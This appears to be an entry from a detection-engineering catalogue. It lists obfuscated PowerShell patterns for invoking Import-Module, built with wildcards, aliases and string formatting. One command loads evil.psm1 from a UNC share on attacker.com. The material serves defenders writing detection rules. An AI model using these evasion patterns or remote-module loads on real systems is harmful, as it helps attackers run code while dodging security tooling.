Import-Module
Load PowerShell modules from disk, UNC paths, or the module store. Used to load malicious modules containing custom cmdlets or offensive toolkits.
Binary Paths
PowerShell cmdlet
Glob Patterns
| Pattern | Notes |
|---|---|
& (gcm I*-M*) -Name \\attacker.com\share\evil.psm1
|
Wildcards on both verb and noun — loads module from UNC path |
& (gcm Import-M*) -Name evil.psm1
|
Star suffix matches 'odule' |
& (gcm I?port-Module) -Name evil.psm1
|
Single char wildcard replaces 'm' |
ipmo -Name evil.psm1
|
Built-in alias 'ipmo' for Import-Module |
& (gal ip?o) -Name evil.psm1
|
Get-Alias with wildcard resolves 'ipmo' |
& (gcm I[l-n]port-Module) -Name evil.psm1
|
Character range [l-n] matches 'm' in Import — only character in range that satisfies Import-Module |
& (gcm *-Module) -Name evil.psm1
|
Prefix wildcard on noun — note: may match other *-Module cmdlets; add -CommandType Cmdlet to limit |
& (gcm ('{0}port-{1}' -f 'Im','Module')) -Name evil.psm1
|
-f format operator constructs 'Import-Module' from fragments before gcm resolves it |
Pattern Tester
$
Try typing Import-Module or a full path like PowerShell cmdlet
YARA Rule
Auto-generated detection rule for Import-Module
Platform Notes
Import-Module loads .psm1, .psd1, or .dll files. It can load from UNC paths (\\server\share\module.psm1) for living-off-the-land network staging. The ipmo alias is built-in. Modules can contain arbitrary cmdlets and functions that execute on import via $PSDefaultParameterValues or module scripts.